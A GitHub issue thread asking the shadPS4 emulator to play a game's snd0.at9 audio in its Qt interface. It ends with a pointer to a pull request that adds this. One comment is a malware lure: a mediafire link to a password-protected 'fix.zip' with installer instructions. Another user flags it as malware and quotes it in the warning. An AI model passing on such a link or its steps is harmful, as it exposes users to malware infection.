### ISSUE TITLE
Playing of snd0.at9

### ISSUE THREAD

**Issue by gandalfthewhite19890404** [shadps4-emu/shadPS4#640]
Please, add playing sce_sys/snd0.at9 playing when game is highlighted in QT GUI.
FFMPEG supports at9, iirc

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by huntyboy102** [comment]
> Download https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file password: changeme In the installer menu, select "gcc."

No one click the link please, it's entirely malware.

**Comment by youzi-2333** [comment]
@huntyboy102 Please don't use quote reply. GitHub may ban you if they detect the keywords.

**Comment by huntyboy102** [comment]
Understood

**Comment by georgemoralis** [comment]
we will probably need to use this https://github.com/Vita3K/LibAtrac9 instead of ffmpeg one since it has been reported to vita3k that there are issues with the ffmpeg one

**Comment by Hermiten** [comment]
This PR add the option https://github.com/shadps4-emu/shadPS4/pull/1033
I close the issue, thanks for the contribution
